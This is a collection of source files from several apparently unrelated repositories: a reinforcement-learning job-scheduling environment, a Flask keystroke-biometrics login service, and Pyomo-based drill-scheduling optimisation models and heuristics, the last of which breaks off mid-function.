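A sketch of the `events.dat` row format the reader above expects (one header line, then whitespace-separated columns) and how a single row maps to an `UTCDateTime` plus metadata; the sample values are invented for illustration.
```python
from obspy.core import UTCDateTime

# year month day hour minute second lat lon depth magnitude eventID
row = "2021 03 14 09 26 53.5 35.70 -117.50 8.2 4.1 1001".split()

origin = UTCDateTime(int(row[0]), int(row[1]), int(row[2]),
                     int(row[3]), int(row[4]), float(row[5]))
meta = [float(row[6]), float(row[7]), float(row[8]), float(row[9])]
evid = str(int(row[10]))

evlist = {evid: [origin, meta]}   # same shape as self.evlist built above
print(evlist)
```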
{
"source": "JoHussien/rl_mc_scheduler",
"score": 2
} |
#### File: Designning the System Latest/env/job_gen_env_v2.py
```python
import numpy as np
import gym
from gym.utils import seeding
from gym.spaces import Box, MultiBinary, Discrete, Dict, flatten, flatten_space
from env.job_generator import create_workload
class MCEnv(object):
pass
class MCEnv(gym.Env):
def __init__(self, env_config= {'job_num': 10, 'total_load': 0.4, 'lo_per': 0.3, 'job_density': 4}):
#add here description of each parameter
self.time = 0
self.job_num = env_config['job_num']
self.total_load = np.random.uniform(low=0.1, high=0.9)#env_config['total_load']
self.lo_per = np.random.uniform(high=1-2/(self.job_num)) #env_config['lo_per']
self.job_density = env_config['job_density']
self.speed = 1
workload = create_workload(self.job_num, self.total_load, self.lo_per, self.job_density)
workload = np.insert(workload, 4, [0] * self.job_num, axis=1)
workload = np.insert(workload, 5, [0] * self.job_num, axis=1)
workload = np.insert(workload, 6, [0] * self.job_num, axis=1)
self.workload = np.abs(workload) # take absolute values to guard against negative processing times
self.action_space = Discrete(self.job_num)
self.observation_space_dict = Dict({
'action_mask': Box(0, 1, shape=(self.job_num,)),
'MCenv': Dict({
'RDP_jobs': Box(low=0, high=np.inf, shape=(self.job_num, 3)),
'CRSE_jobs': MultiBinary(self.job_num*4),
'Processor': Box(low=np.array([0., 0.]), high=np.array([1, np.inf])),
})
})
self.observation_space = flatten_space(self.observation_space_dict)
self.workload[:, 4][self.time >= self.workload[:, 0]] = 1
self.workload[:, 5][self.time + self.workload[:, 2]/self.speed > self.workload[:, 1]] = 1 #jobs that can't be done anyway
#TODO: handle cases of multiple switches between degradation and normal execution
self.degradation_schedule = np.random.uniform(high=np.sum(workload[:, 2]))
self.degradation_speed = np.random.uniform(low=self.total_load)
self.action_mask = np.ones(self.job_num)
self.buffer = [] # released jobs currently available for selection
self.chosen = [] # jobs that have been scheduled so far
self.seed()
def fill_buffer(self,workload):
# Logic: each time we enter here we append only the released jobs. The buffer size is currently 5,
# while the workload we generate has 10 jobs. Once filled, the buffer is passed to step(), where the
# selected job must come from the buffer rather than from the workload. The time is then updated
# based on the chosen job, and the buffer is refilled afterwards. A job selected before will not be
# selected again, since it is either executed or starved, and the choice of a specific job is
# reflected the next time we select from the buffer. For the reward we need to know which jobs
# starved and which were executed, so every selected job is also appended to the "chosen" buffer;
# at the end we then know what was scheduled and what starved. The buffer size is kept at 5.
last_deadline=self.workload[self.job_num-1][1]
nop=np.array([last_deadline,last_deadline+1,2,0,0,0,0])
added=0
for job in workload:
if((job[0]>=self.time) and (job[5]==0) and (len(self.buffer)<5)): #Released and not starved and still there is a space
self.buffer.append(job)
added = added + 1
for el in range(5-len(self.buffer)):
self.buffer.append(nop)
return self.buffer
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def step(self, action):
#define step logic
done = self._done()
prev_workload = np.copy(self.workload)
reward = 0
buffer=self.fill_buffer(self.workload) #Now we should replace each self.workload with buffer
self.chosen.append(buffer[action]) #To know at the end what was scheduled
self.buffer.pop(action) # remove the selected job from the buffer
if self.workload[action, 5] or self.workload[action, 6]:
return self._get_obs(), -10, done, {}
#reward = -10
else:
time = max(self.time, self.workload[action, 0])
if time >= self.degradation_schedule:
self.speed = self.degradation_speed
time += self.workload[action, 2] / self.speed
elif self.workload[action, 2] + time < self.degradation_schedule:
time += self.workload[action, 2]
else:
time_in_norm = self.degradation_schedule - time
self.speed = self.degradation_speed
time_in_deg = (self.workload[action][2] - time_in_norm) / self.speed
time += time_in_norm + time_in_deg
# double check: in case of degradation the time may not increment properly, which might lead to a job starving unexpectedly
if time <= self.workload[action, 1]:
self.time = time
self.workload[action, 6] = 1
self.workload[:, 4][self.time >= self.workload[:, 0]] = 1
starved_condition = (self.time >= self.workload[:, 1]) * (1 - self.workload[:, 6]).astype(bool)
self.workload[:, 5][starved_condition] = 1
will_starve_condition = (self.time + self.workload[:, 2] / self.speed > self.workload[:, 1]) \
* (1 - self.workload[:, 6]).astype(bool)
self.workload[:, 5][will_starve_condition] = 1
done = self._done()
# reward = -np.sum((self.workload[:, 5] - prev_workload[:, 5])*self.reward_weights)
if done and self.workload[self.workload[:, 3].astype(bool), 6].all():
reward += np.sum(self.workload[:, 6])
return self._get_obs(), reward, done, {}
def _update_available(self):
self.action_mask[self.workload[:, 5].astype(bool) | self.workload[:, 6].astype(bool)] = 0
def _get_obs(self):
self._update_available()
obs_dict = dict({'action_mask': self.action_mask, 'MCenv': dict(
{'RDP_jobs': np.array(self.workload[:, :3]),
'CRSE_jobs': np.array(self.workload[:, 3:]).flatten(),
'Processor': np.array([1, 0]).flatten()})
})
return obs_dict #flatten(self.observation_space_dict, obs_dict)
def reset(self):
self.time = 0
self.speed = 1
self.total_load = np.random.uniform(low=0.2, high=0.9) # env_config['total_load']
self.lo_per = np.random.uniform(high=1 - 2 / (self.job_num)) # env_config['lo_per']
workload = create_workload(self.job_num, self.total_load, self.lo_per, self.job_density)
workload = np.insert(workload, 4, [0] * self.job_num, axis=1) #Released
workload = np.insert(workload, 5, [0] * self.job_num, axis=1) #Starved
workload = np.insert(workload, 6, [0] * self.job_num, axis=1) #Executed
self.workload = np.abs(workload)
self.workload[:, 4][self.time >= self.workload[:, 0]] = 1
self.workload[:, 5][self.time + self.workload[:, 2]/self.speed > self.workload[:, 1]] = 1
self.degradation_schedule = np.random.uniform(high=np.sum(workload[:, 2]))
self.degradation_speed = np.random.uniform(low=self.total_load)
self.action_mask = np.ones(self.job_num)
self.buffer = []
self.chosen = []
return self._get_obs()
def _done(self):
return bool((self.workload[:, 5].astype(bool) | self.workload[:, 6].astype(bool)).all())
def get_workload(self):
print(self.workload)
``` |
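The time update in `step()` has three cases, depending on whether the selected job starts after the degradation point, finishes before it, or straddles it. A standalone arithmetic sketch of those branches (all numbers are made up):
```python
# processor degrades at t = 10 to half speed; the chosen job starts at t = 8
degradation_schedule = 10.0
degradation_speed = 0.5
time, processing = 8.0, 6.0

if time >= degradation_schedule:                 # entirely in the degraded regime
    time += processing / degradation_speed
elif processing + time < degradation_schedule:   # finishes before degradation
    time += processing
else:                                            # straddles the degradation point
    time_in_norm = degradation_schedule - time                       # 2.0 at full speed
    time_in_deg = (processing - time_in_norm) / degradation_speed    # 4.0 / 0.5 = 8.0
    time += time_in_norm + time_in_deg
print(time)   # 18.0
```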
{
"source": "johwconst/DKA",
"score": 2
} |
#### File: DKA/webservice/server.py
```python
from database.db_connect import drop_db, create_db, add_user_and_passw, check_user_and_passw, get_user_id
from knn_sdk.ClassificadorKNN import Classificador
import datetime
import csv
from flask import Flask, render_template, request, jsonify, url_for
TYPING_DATA_PATH = './database/biometria.csv' # Path where the .csv data and the database are saved
LOG_NAME = 'resultados.log'
K = 1
SPLIT = 0.8
app = Flask(__name__, static_folder='./static')
@app.route('/')
def home():
return render_template('./home/home.html')
@app.route('/cadastro', methods = ['GET', 'POST'])
def cadastro():
if request.method == 'GET':
return render_template('./cadastro/cadastro.html')
elif request.method == 'POST':
response = dict(request.get_json())
username = response['username']
password = response['password']
id, result = add_user_and_passw(username, password)
if result:
return jsonify({'cadastro_cod': 'UserRegistrySuccess', 'id_usuario': id})
else:
return jsonify({'cadastro_cod': 'UsernameAlreadyExist'})
@app.route('/cadastro/biometria', methods = ['POST'])
def biometria():
if request.method == 'POST':
response = dict(request.get_json())
user_id = response['user_id']
data = response['data']
data.append(user_id) # append the user id to the end of the list
try:
with open(TYPING_DATA_PATH, 'a', newline='') as file:
writer = csv.writer(file)
writer.writerow(data)
return jsonify({'biometric_cod': 'Success'})
except:
return jsonify({'biometric_cod': 'Não foi possivel cadastrar os dados biometricos'})
@app.route('/treinar/biometria', methods = ['POST'])
def treinar():
if request.method == 'POST':
response = dict(request.get_json())
username = response['username']
data = response['data']
user_id = get_user_id(username)
if user_id == None: # if an unregistered username is typed during training, still make use of the data
user_id = 999
data.append(user_id) # append the user id to the end of the list
try:
with open(TYPING_DATA_PATH, 'a', newline='') as file:
writer = csv.writer(file)
writer.writerow(data)
return jsonify({'biometric_cod': 'Success'})
except:
return jsonify({'biometric_cod': 'Não foi possivel cadastrar os dados biometricos'})
@app.route('/login', methods = ['GET'])
def login():
return render_template('./login/login.html')
@app.route('/login/auth1', methods = ['POST']) # Route for the first authentication factor
def auth1():
response = dict(request.get_json())
username = response['username']
password = response['password']
id, result, user_id = check_user_and_passw(username, password)
if result:
return jsonify({'auth1_code': 'success', 'id_usuario': user_id})
else:
if id == 3:
return jsonify({'auth1_code': 'UsernameNotExist'})
elif id == 1:
return jsonify({'auth1_code': 'PasswordIsWrong'})
@app.route('/login/auth2', methods = ['POST']) # Route for the second authentication factor
def auth2():
response = dict(request.get_json())
amostra_digitacao = response['typing_data']
user_id = response['user_id']
##### Classification
classifica = Classificador(TYPING_DATA_PATH, amostra_digitacao, SPLIT, K)
resultado = classifica.knn_manhattan_sem_treino()
cross_val_score = classifica.get_cv_score()
if str(user_id) in resultado[0]:
match = True
else:
match = False
data_hora_atual = datetime.datetime.now()
data_atual = data_hora_atual.strftime("%d/%m/%Y %H:%M:%S ")
with open(LOG_NAME, 'a') as arquivo: # create/append the log file
arquivo.write('[+] Usuario Real: ')
arquivo.write(str(user_id))
arquivo.write(' | Usuario Previsto: ')
arquivo.write(str(resultado[0]))
arquivo.write(' | Algoritimo: ')
arquivo.write(str(resultado[2]))
arquivo.write(' | Valor de K: ')
arquivo.write(str(K))
arquivo.write(' | Match: ')
arquivo.write(str(match))
arquivo.write(' | Accuracy: ')
arquivo.write(str(cross_val_score))
arquivo.write(' | Data: ')
arquivo.write(data_atual)
arquivo.write('\n')
return jsonify({'user_id':str(user_id), 'predict': resultado[0], 'accuracy': cross_val_score, 'result': str(match), 'algoritimo': resultado[2]})
@app.route('/treinar', methods = ['GET', 'POST'])
def treina_bio():
if request.method == 'GET':
return render_template('./treinamento/treinamento.html')
@app.route('/best_params', methods = ['GET'])
def best_params():
return render_template('./best_params/best_params.html')
@app.route('/best_params/result', methods = ['GET'])
def best_params_result():
amostra_digitacao = '' # workaround to allow using the class without a typing sample
classifica = Classificador(TYPING_DATA_PATH, amostra_digitacao, 0.7, 3)
best_score, best_params, best_estimator = classifica.hyper_parameters_tuning()
data_hora_atual = datetime.datetime.now()
data_atual = data_hora_atual.strftime("%d/%m/%Y %H:%M:%S ")
with open(LOG_NAME, 'a') as arquivo: # create/append the log file
arquivo.write('[+] Best Score: ')
arquivo.write(str(best_score))
arquivo.write(' | Best Params: ')
arquivo.write(str(best_params))
arquivo.write(' | Best Estimator: ')
arquivo.write(str(best_estimator))
arquivo.write(' | Data: ')
arquivo.write(data_atual)
arquivo.write('\n')
return jsonify({'best_score':str(best_score), 'best_params': str(best_params), 'best_estimator': str(best_estimator) })
# Server Start
if __name__ == '__main__':
app.run(host='127.0.0.1', debug=True, port=3000)
``` |
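A small client-side sketch of the registration and first-factor login flow above, using `requests` against a locally running server. The routes and JSON keys mirror the handlers; the credentials and returned ids are placeholders.
```python
import requests

BASE = 'http://127.0.0.1:3000'

# register a user: /cadastro reads 'username' and 'password' from the JSON body
r = requests.post(BASE + '/cadastro',
                  json={'username': 'alice', 'password': 's3cret'})
print(r.json())   # e.g. {'cadastro_cod': 'UserRegistrySuccess', 'id_usuario': 1}

# first authentication factor
r = requests.post(BASE + '/login/auth1',
                  json={'username': 'alice', 'password': 's3cret'})
print(r.json())   # e.g. {'auth1_code': 'success', 'id_usuario': 1}
```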
{
"source": "johwiebe/drill-scheduling",
"score": 3
} |
#### File: johwiebe/drill-scheduling/algorithms.py
```python
import copy
import time
import numpy as np
def no_degradation_heuristic(s, Rmax=10):
s.build(Rmax=Rmax)
s.multisolve()
s = reconstruct_r(s)
return s
def no_degradation_start_heuristic(s):
t_start = time.time()
s = no_degradation_heuristic(s)
Xmax = get_maintenance_locations(s)
s.build(Xm=Xmax)
s.multisolve()
s.time = time.time() - t_start
return s, s.m.Obj()
def boundary_heuristic(s):
t_start = time.time()
s = no_degradation_heuristic(s)
Xm = get_maintenance_locations(s)
best_obj = float('Inf')
best_s = None
n_iter = 0
done = False
# Iterate until all # of maint have been explored
while not done:
# Iterate while optimal maint. is at segment bound
at_bound = True
while at_bound:
s.build(Xm=Xm)
s.multisolve()
print(Xm)
n_iter += 1
if s.m.Obj() < best_obj:
best_s = copy.copy(s)
best_obj = s.m.Obj()
Xm, at_bound = check_if_at_bound(s)
if len(Xm) > 0:
Xm.pop(0)
else:
done = True
best_s.n_iter = n_iter
best_s.time = time.time() - t_start
return best_s, best_obj
def midpoints(xstart, xfin, n):
eps = (np.array(range(n)) + 1)/(n + 1)
x = xstart + (xfin - xstart)*eps
return x.tolist()
def Xm_from_Nm(X, Nm):
Xm = []
for n in set(Nm):
Xm += midpoints(X[n], X[n+1], Nm.count(n))
Xm.sort()
return Xm
def enum(s):
t_start = time.time()
s = no_degradation_heuristic(s)
geo = s.geology
X = geo.transitions + [s.xfin]
Xmax = get_maintenance_locations(s)
Nmax = [geo.segment(x) for x in Xmax]
s.build(Xm=Xmax)
s.multisolve()
best_s = copy.copy(s)
best_obj = s.m.Obj()
n_iter = 0
for m in reversed(range(len(Xmax))):
Nm = [0] * (m + 1)
Nmax = Nmax[-(m + 1):]
i = m
while not Nm == Nmax:
if Nm[i] < Nmax[i]:
Nm[i:] = [Nm[i] + 1] * (m + 1 - i)
i = m
Xm = Xm_from_Nm(X, Nm)
print(Xm, Nm, Nmax)
s.build(Xm=Xm)
s.multisolve()
n_iter += 1
if s.m.Obj() <= best_obj and s.opt > 0:
best_s = copy.copy(s)
best_obj = s.m.Obj()
else:
i -= 1
s.build(Xm=[])
s.multisolve()
if s.m.Obj() <= best_obj and s.opt > 0:
best_s = copy.copy(s)
best_obj = s.m.Obj()
best_s.n_iter = n_iter
best_s.time = time.time() - t_start
return best_s, best_obj
def reconstruct_r(s):
R = s.m.R[s.X[-2]]()
xfin = s.X[-1]
for x in reversed(s.X[:-1]):
s.m.R[x].value = R
r = s.m.r[x]()
rop = s.m.rop[x].V()
dx = xfin - x
R = R - dx/rop*r
xfin = x
return s
def get_maintenance_locations(m):
df = m.get_schedule()
R = df['R'].max()
RR = df['R'].tolist()
RR.insert(0, 0)
X = df['x'].tolist()
X.append(m.xfin)
Xm = []
while R > 1:
R -= 1
i = df[df['R'] >= R].index[0]
dx = X[i+1] - X[i]
dR = RR[i+1] - RR[i]
Xm.append(X[i] + dx * (R - RR[i])/dR)
Xm.sort()
return Xm
def to_number(x):
if not isinstance(x, (int, float)):
x = x.value
return x
def check_if_at_bound(m):
Xm = []
X = [to_number(x) for x in m.Xvar]
at_bound = False
tol = 10e-3
for i, x in enumerate(m.Xvar):
if not isinstance(x, (int, float)):
# Drop maint if it is at xstart or xfin
if X[i] - X[0] < tol or X[-1] - X[i] < tol:
at_bound = True
# Move to previous segment if at min bound
elif X[i] - X[i-1] < tol:
Xm.append((X[i-1] + X[i-2])/2)
at_bound = True
# Move to next segment if at max bound
elif X[i+1] - X[i] < tol:
Xm.append((X[i+1] + X[i+2])/2)
at_bound = True
# Keep it where it is if not at bound
else:
Xm.append(X[i])
Xm.sort()
return Xm, at_bound
```
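A worked example of the two helpers that place candidate maintenance points: `midpoints` spreads `n` points evenly inside one segment, and `Xm_from_Nm` turns a per-segment count into concrete locations (assuming `algorithms.py` is importable).
```python
from algorithms import midpoints, Xm_from_Nm

# three points spread evenly over the segment [0, 100]
print(midpoints(0, 100, 3))    # [25.0, 50.0, 75.0]

# segment boundaries at x = 0, 100, 250; two maintenances in segment 0, one in segment 1
X = [0, 100, 250]
Nm = [0, 0, 1]
print(Xm_from_Nm(X, Nm))       # [33.33..., 66.66..., 175.0]
```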
#### File: johwiebe/drill-scheduling/geology.py
```python
import bisect
class Rock():
""" Stores rock parameters for Detournay bit-rock interaction model. """
def __init__(self, Sstar, wstar, xieps, mugam, betaw, xi):
self.Sstar = Sstar
self.wstar = wstar
self.xieps = xieps
self.mugam = mugam
self.betaw = betaw
self.xi = xi
class Geology():
""" Stores geology as a list of rock types. """
def __init__(self, data):
self.data = data
self.transitions = list(data.keys())
self.transitions.sort()
def lookup(self, x):
""" Look up rock parameters at depth/length x. """
key = max(key for key in self.data.keys() if x - key >= 0)
return self.data[key]
def __call__(self, x):
return self.lookup(x)
def segment(self, x):
return bisect.bisect_left(self.transitions, x) - 1
def midpoint(self, i, xfin):
trans = self.transitions + [xfin]
return (trans[i+1] + trans[i])/2
def start(self, i):
return self.transitions[i]
```
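A short usage sketch: a two-layer geology with a rock transition at 1200 m. The `Rock` parameter values are placeholders, not calibrated data.
```python
from geology import Rock, Geology

# Rock(Sstar, wstar, xieps, mugam, betaw, xi) -- placeholder numbers
soft = Rock(Sstar=60., wstar=2., xieps=120., mugam=0.6, betaw=0.5, xi=0.8)
hard = Rock(Sstar=110., wstar=3., xieps=200., mugam=0.7, betaw=0.6, xi=0.9)

geo = Geology({0: soft, 1200: hard})

print(geo(800) is soft)        # True: depth 800 m is in the first layer
print(geo(1500) is hard)       # True
print(geo.segment(800))        # 0 (index of the segment containing x = 800)
print(geo.midpoint(0, 2000))   # 600.0 (midpoint of the first segment, with xfin = 2000)
```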
#### File: johwiebe/drill-scheduling/ropo.py
```python
import time
import pyomo.environ as p
class ROPO():
"""
Connect ROP to weight-on-bit and drill string rotational speed.
Args:
rock: Rock object
drillstring: DrillString object
m: pyomo model/block to use (for use within scheduling model)
"""
def __init__(self, rock, drillstring, m=None, piecewise=False):
if m is None:
# Initialize pyomo model if none was provided
self.m = p.ConcreteModel()
else:
self.m = m
self.bit = drillstring.bit
self.pdm = drillstring.pdm
self.rock = rock
self.m.cons = p.ConstraintList()
# Add variables, constraints and objective to model
self.add_vars(piecewise=piecewise)
self.add_cons(piecewise=piecewise)
if m is None:
self.add_obj()
# TODO: this seems to be obsolete?
def build_block(self, piecewise=False):
b = p.Block()
self.add_vars(b, piecewise=piecewise)
self.add_cons(b, piecewise=piecewise)
def add_vars(self, piecewise=False):
""" Add pyomo variables to model. """
m = self.m
m.d = p.Var(within=p.NonNegativeReals) # depth of cut per revol.
m.Ntop = p.Var(within=p.NonNegativeReals,
bounds=(0, 200)) # RPM at top/drillstring
m.Npdm = p.Var(within=p.NonNegativeReals) # PDM RPM (relative)
m.deltap = p.Var(within=p.NonNegativeReals) # Differential pressure
wstar = self.rock.wstar
if piecewise:
wmin = 0
else:
wmin = wstar
m.w = p.Var(within=p.NonNegativeReals,
bounds=(wstar, 2*wstar)) # Reduced weight-on-bit
# m.W = p.Var(within=p.NonNegativeReals) # Weight-on-bit
m.t = p.Var(within=p.NonNegativeReals) # Reduced torque
m.Tcap = p.Var(within=p.NonNegativeReals,
bounds=(0, 100000)) # Torque
m.V = p.Var(within=p.NonNegativeReals,
bounds=(0.0, 1000)) # Rate of penetration
def add_obj(self):
m = self.m
# Maximize ROP V = d*(N_top + N_pdm)
V = m.d * (m.Ntop + m.Npdm)
m.Obj = p.Objective(expr=V, sense=p.maximize)
def add_cons(self, piecewise=False):
""" Add Detournay and powercurve constraints to model. """
m = self.m
bit = self.bit
rock = self.rock
# Detournay rock-bit interaction model
m.cons.add(m.t == 2*m.Tcap*1000/(bit.a**2*(1 - bit.rho**2)))
if piecewise:
x = [0, rock.wstar, 2*rock.wstar]
y = [0, rock.wstar/rock.Sstar,
rock.wstar/rock.Sstar + rock.wstar/rock.xieps]
# TODO: Pyomo BIGM_BIN is deprecated
m.dvsw = p.Piecewise(m.d, m.w, pw_pts=x,
pw_constr_type='EQ',
pw_repn='BIGM_BIN',
f_rule=y)
transition = rock.betaw/(1 - rock.mugam*rock.xi)
x = [0, transition, max(2*transition, 2*rock.wstar)]
y = [0, rock.mugam*x[1], 1/rock.xi*(x[2] - rock.betaw)]
m.tvsw = p.Piecewise(m.t, m.w, pw_pts=x,
pw_constr_type='EQ',
pw_repn='BIGM_BIN',
f_rule=y)
else:
m.cons.add(m.d == rock.wstar/rock.Sstar
+ (m.w - rock.wstar)/rock.xieps)
m.cons.add(m.t == 1/rock.xi*(m.w - rock.betaw))
# Powercurve relationships
m.cons.add(m.Npdm == self.pdm.rpm(m.deltap))
m.cons.add(m.Tcap == self.pdm.torque(m.deltap)*1355.82)
m.cons.add(m.V == m.d/1000 * (m.Ntop + m.Npdm)*60)
def solve(self, solver='Bonmin'):
"""
Solve model.
Args:
solver: gams solver to use
"""
tstart = time.perf_counter()
self.solver = p.SolverFactory('gams', solver_io='shell')
results = self.solver.solve(self.m,
logfile='drilling.log',
io_options={'solver': solver},
symbolic_solver_labels=True)
results.write()
self.time = time.perf_counter() - tstart
return results.solver.status, results.solver.termination_condition
```
#### File: drill-scheduling/scheduling/discrete.py
```python
import math
import bisect
import curves
import pyomo.environ as p
import pandas as pd
import scipy as sp
from ropo import ROPO
class Deterministic():
"""
Drill-scheduling model.
Args:
geology: Geology object
drillstring: DrillString object
cost_maint: Curve predicting cost of maintenance
xfin: final depth/length
deltax (200): segment length
xstart (0): initial depth/length
"""
def __init__(self, geo, drillstring, cost_maint,
xfin, deltax=200, xstart=0, method='det', alpha=0.5,
mip=True, penalty=False):
self.geology = geo
self.drillstring = drillstring
self.cost_maint = cost_maint # TODO: should be part of DrillString?
self.xstart = xstart
self.xfin = xfin
self.method = method
self.alpha = alpha
self.mip = mip
self.penalty = penalty
self.eps = 0.0001
self.get_segments(xstart, xfin, deltax)
self.m = p.ConcreteModel()
self.m.cons = p.ConstraintList()
self.add_vars(mip)
self.add_rop(mip)
self.add_deg()
self.add_obj()
def get_segments(self, xstart, xfin, deltax):
""" Split length into segments under consideration of geology. """
n_seg = math.ceil((xfin - xstart)/deltax)
# Split into segments of length deltax
X = [xstart + i*deltax for i in range(0, n_seg)] + [xfin]
# Split where rock types change
for x in self.geology.transitions:
if x not in X:
bisect.insort(X, x)
self.X = set(X[:-1])
self.Xlist = X[:-1]
self.N = len(self.X)
self.delta = {X[i]: X[i+1] - X[i] for i in range(self.N)}
def add_vars(self, mip):
self.m.y = p.Var(self.X, within=p.NonNegativeReals, bounds=(0, 1))
self.m.R = p.Var(self.X, within=p.NonNegativeReals, bounds=(0, 1))
self.m.r = p.Var(self.X, within=p.NonNegativeReals, bounds=(0, 1))
if mip:
self.m.z = p.Var(self.X, within=p.Binary)
def add_rop(self, mip):
""" Add ROPO model for each segment. """
self.m.rop = p.Block(self.X)
self.blocks = [ROPO(self.geology(x),
self.drillstring,
self.m.rop[x], piecewise=mip) for x in self.X]
def calc_dt(self, x):
return self.delta[x]/(self.m.rop[x].V + self.eps)
def add_deg(self):
""" Add degradation constraints. """
R = 0
fc = self.drillstring.pdm.failure
for x in self.Xlist:
dt = self.delta[x] / (self.m.rop[x].V + self.eps)
dp = self.m.rop[x].deltap
if isinstance(fc, curves.WarpedGP):
r = fc(dp, self.m.r[x], self.m.cons)
# Explicit definition
else:
r = fc(dp)
self.m.cons.add(self.m.r[x] == r)
R += dt*self.m.r[x]
R -= self.m.y[x]
self.m.cons.add(self.m.R[x] == R)
# z_x >= y_x
if self.mip:
self.m.cons.add(self.m.z[x] >= self.m.y[x])
def add_obj(self):
""" Add objective to model. """
# Cost of/time spent drilling
self.m.cost_drill = p.Var()
cost_drilling = sum([self.delta[x]/(self.m.rop[x].V + self.eps)
for x in self.X])
self.m.cons.add(self.m.cost_drill == cost_drilling)
# Cost of/time spent on maintenance
self.m.cost_maint = p.Var()
if self.mip:
z = self.m.z
else:
z = self.m.y
cost_maint = sum([z[x]*self.cost_maint(x + self.delta[x])
for x in self.X])
self.m.cons.add(self.m.cost_maint == cost_maint)
# Total cost/time to completion
cost = cost_drilling + cost_maint
# Add penalty
if self.penalty:
cost += sum([self.m.y[x]**2 for x in self.X])
self.m.Obj = p.Objective(expr=cost, sense=p.minimize)
def add_cons(self):
pass
def solve(self, solver='Bonmin', options={}):
""""
Solve model.
Args:
solver: gams solver to use
options: dict of solver/gams options
"""
if solver == 'Ipopt':
self.solver = p.SolverFactory('ipopt', solver_io='nl')
results = self.solver.solve(self.m,
tee=True,
logfile='drilling.log',
symbolic_solver_labels=True)
else:
self.solver = p.SolverFactory('gams', solver_io='shell')
opt = {'optcr': 0.001, 'resLim': 60}
opt.update(options)
opt_list = ['option {0}={1};'.format(key, val)
for key, val in opt.items()]
results = self.solver.solve(self.m,
tee=True,
logfile='drilling.log',
io_options={'solver': solver},
symbolic_solver_labels=True,
add_options=opt_list)
results.write()
self.time = results['Solver'][0]['User time']
self.lb = results['Problem'][0]['Lower bound']
return results.solver.status, results.solver.termination_condition
def print_schedule(self):
""" Print schedule. """
for x in self.Xlist:
print('x: {0}, ROP: {1}, R: {2},'.format(x, self.m.rop[x].V(),
self.m.R[x]()),
'dp: {0}, t: {1}, w: {2},'.format(self.m.rop[x].deltap(),
self.m.rop[x].t(),
self.m.rop[x].w()),
'z: {0}, y: {1}'.format(self.m.z[x](),
self.m.y[x]()))
def get_schedule(self):
""" Return schedule as pandas DataFrame. """
res = []
for x in self.Xlist:
res.append({'x': x, 'ROP': self.m.rop[x].V(), 'R': self.m.R[x](),
'dp': self.m.rop[x].deltap(), 't': self.m.rop[x].t(),
'w': self.m.rop[x].w(), 'z': self.m.z[x](),
'y': self.m.y[x]()})
return pd.DataFrame(res)
def calc_avg_V(self):
""" Calculate and return average ROP. """
return sum([self.m.rop[x].V() for x in self.X])/self.N
class Wolfe(Deterministic):
def __init__(self, geology, drillstring, cost_maint,
xfin, deltax=200, xstart=0, method='det', alpha=0.5,
mip=True, penalty=False):
super().__init__(geology, drillstring, cost_maint,
xfin, deltax=deltax, xstart=xstart,
method=method, alpha=alpha,
mip=mip, penalty=penalty)
def add_deg(self):
""" Add degradation constraints. """
r = 0
pad = 0
for x in self.Xlist:
dt = self.delta[x] / (self.m.rop[x].V + self.eps)
dp = self.m.rop[x].deltap
r += self.drillstring.pdm.degradation(dt, dp)
r -= self.m.y[x]
F = sp.stats.norm.ppf(self.alpha)
pad += dt*self.drillstring.pdm.failure.calc_var(dp)*dt
for xp in [xi for xi in self.Xlist if xi < x]:
dtp = self.delta[xp] / (self.m.rop[xp].V + self.eps)
dpp = self.m.rop[xp].deltap
sig = self.drillstring.pdm.failure.calc_var(dp, dpp)
pad += 2*dt*sig*dtp
self.m.cons.add(r + F*p.sqrt(pad + self.eps) <= 1)
# self.m.cons.add(r + F*p.sqrt(0.0001) <= 1)
# 0 <= R_x <= 1 for all x
self.m.cons.add(self.m.R[x] == r)
# z_x >= y_x
if self.mip:
self.m.cons.add(self.m.z[x] >= self.m.y[x])
# self.m.cons.add(sum([self.m.z[x] for x in self.X]) <= 2)
class Chance(Deterministic):
"""
Drill scheduling model with chance constraint for Gaussian uncertainty
Args:
geology: Geology object
drillstring: DrillString object
cost_maint: Curve predicting cost of maintenance
xfin: final depth/length
deltax (200): segment length
xstart (0): initial depth/length
"""
def __init__(self, geology, drillstring, cost_maint,
xfin, eps, deltax=200, xstart=0):
self.eps = eps
self.F = sp.stats.norm.ppf(1 - eps)
super().__init__(geology, drillstring, cost_maint, xfin,
deltax=deltax, xstart=xstart)
def add_deg(self):
self.m.n = p.Var(within=p.NonNegativeIntegers)
# self.m.z = p.Var(self.X, within=p.Binary)
self.m.z = p.Var(self.X, within=p.NonNegativeReals, bounds=(0, 1))
self.m.y = p.Var(self.X, within=p.NonNegativeReals, bounds=(0, 1))
self.m.R = p.Var(self.X, within=p.NonNegativeReals, bounds=(0, 1))
self.m.sig = p.Var(self.X, within=p.NonNegativeReals)
r = 0
var = 0
for x in self.Xlist:
dt = self.delta[x]/(self.m.rop[x].V + self.eps)
dp = self.m.rop[x].deltap
r += self.drillstring.pdm.degradation(dt, dp)
var += self.drillstring.pdm.variance(dt, dp)
self.m.cons.add(self.m.sig[x] == p.sqrt(var))
r -= self.m.y[x]
self.m.cons.add(self.m.R[x] == r + p.sqrt(var)*self.F)
self.m.cons.add(self.m.z[x] >= self.m.y[x])
self.m.cons.add(sum([self.m.z[x] for x in self.X]) == self.m.n)
class Gamma(Deterministic):
"""
Drill-scheduling model using Chernoff bounds and Gamma uncertainty.
NOTE: Very experimental
"""
def __init__(self, geology, drillstring, cost_maint,
xfin, eps, deltax=200, xstart=0):
self.eps = eps
super().__init__(geology, drillstring, cost_maint, xfin,
deltax=deltax, xstart=xstart)
def add_deg(self):
self.m.n = p.Var(within=p.NonNegativeIntegers)
self.m.z = p.Var(self.X, within=p.Binary)
self.m.y = p.Var(self.X, within=p.NonNegativeReals, bounds=(0, 1))
self.m.R = p.Var(self.X, within=p.NonNegativeReals, bounds=(0, 1))
self.m.s = p.Var(self.X, within=p.NonNegativeReals,
bounds=(0.001, 100000))
self.m.sig = p.Var(self.X, within=p.NonNegativeReals)
R = 0
for x in self.Xlist:
r = -self.m.s[x]
rhs = 0
lhs = 1
for x2 in [xi for xi in self.Xlist if xi <= x]:
dt = self.delta[x2]/(self.m.rop[x2].V + self.eps)
dp = self.m.rop[x2].deltap
mu = self.drillstring.pdm.degradation(dt, dp)
sig = self.drillstring.pdm.sig(dt, dp)
k = self.drillstring.pdm.k(dt, dp)
r -= p.log(1 - sig*self.m.s[x]) * k
r -= self.m.s[x] * self.m.y[x2]
